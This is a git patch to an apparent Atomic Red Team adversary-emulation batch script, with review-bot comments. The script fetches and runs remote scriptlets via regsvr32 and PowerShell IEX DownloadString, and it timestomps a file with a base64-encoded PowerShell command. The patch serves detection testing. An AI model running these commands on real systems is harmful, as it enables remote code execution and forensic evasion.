From 2da4ce1e9b4e33008f61f9ceb155ca2b3dba2811 Mon Sep 17 00:00:00 2001
From: caseysmithrc <30840394+caseysmithrc@users.noreply.github.com>
Date: Wed, 29 Nov 2017 11:21:48 -0700
Subject: [PATCH] Fix Dragon's Tail .bat
---
 .../chain_reaction_DragonsTail.bat | 16 +++++++++++++---
 1 file changed, 13 insertions(+), 3 deletions(-)
diff --git a/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.bat b/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.bat
index 201697c5..6e710763 100644
--- a/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.bat
+++ b/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.bat
@@ -11,6 +11,8 @@
 SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll" /mo 30
+SCHTASKS /Run /TN "Atomic Testing"
+
 SCHTASKS /Delete /TN "Atomic Testing" /F
 :: Tactics: Execution
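Review bot: `SCHTASKS /Run` returns as soon as the task is queued, and the very next line deletes the task with `/F`, so the regsvr32 action can be torn down before it ever launches and the execution telemetry this chain is meant to produce is not guaranteed; put a short wait between the two, e.g. `timeout /t 10 /nobreak >nul`. The task action also fetches `RegSvr32.sct` from the unpinned `master` path over HTTPS, so what regsvr32 executes on the test host is whatever that branch holds at run time; pinning the URL to a commit SHA would make the test reproducible and keep a later change to that file from silently altering what runs here. The `/Create` line and the `/SC MINUTE /mo 30` schedule are context only, and the rest of the .bat (including any earlier cleanup or setup) is outside this hunk.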
@@ -21,12 +23,20 @@ powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githu
 :: Tactics: Defense Evasion
 :: Technique: Timestomp https://attack.mitre.org/wiki/Technique/T1099
 :: Source: https://gist.github.com/obscuresec/7b0cf71d7a8dd5e7b54c
+:: To Encode A Command
+:: $Text = '$file=(gi test.txt);$date=''7/16/1945 5:29am'';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date'
+:: $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
+:: $EncodedText =[Convert]::ToBase64String($Bytes)
+:: $EncodedText
 echo "Atomic Test File" > test.txt
-PowerShell.exe -com {$file=(gi test.txt);$date='06/06/2006 12:12 pm';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date}
+
+::PowerShell.exe -com {$file=(gi test.txt);$date = '7/16/1945 5:29am';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date}
+
+PowerShell.exe -enc JABmAGkAbABlAD0AKABnAGkAIAB0AGUAcwB0AC4AdAB4AHQAKQA7ACQAZABhAHQAZQA9ACcANwAvADEANgAvADEAOQA0ADUAIAA1ADoAMgA5AGEAbQAnADsAJABmAGkAbABlAC4ATABhAHMAdABXAHIAaQB0AGUAVABpAG0AZQA9ACQAZABhAHQAZQA7ACQAZgBpAGwAZQAuAEwAYQBzAHQAQQBjAGMAZQBzAHMAVABpAG0AZQA9ACQAZABhAHQAZQA7ACQAZgBpAGwAZQAuAEMAcgBlAGEAdABpAG8AbgBUAGkAbQBlAD0AJABkAGEAdABlAA==
 :: Tactics: Defense Evasion
 :: technique: File Deletion https://attack.mitre.org/wiki/Technique/T1107
-:: Deletes File, detection here would be File Modificaiton
-del test.txt
+:: Deletes File, detection here would be File Modification
+::del test.txt
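Review bot: With `del test.txt` commented out at the end of the hunk, the chain now leaves the timestomped `test.txt` on disk and the T1107 "File Deletion" step directly above it no longer does anything, although its `:: Deletes File` comment still says it does. If the file is kept on purpose so the stomped attributes can be inspected, say so in place of the dead line, e.g. `:: test.txt is intentionally left in place so the timestomped attributes can be examined; remove it by hand`; otherwise restore the deletion after a short `timeout` so the stomped file exists long enough to be observed. The base64 on the new `-enc` line decodes (UTF-16LE) to the plaintext given in the `$Text` comment, so recipe and payload currently agree; the commented `-com` line differs only in spacing around `$date =`, so keep all three in step if the date string changes again. One caveat worth a comment for whoever writes the detection: setting `LastWriteTime`/`LastAccessTime`/`CreationTime` through .NET rewrites only the NTFS $STANDARD_INFORMATION timestamps, so a comparison against the $FILE_NAME attribute still shows the real times.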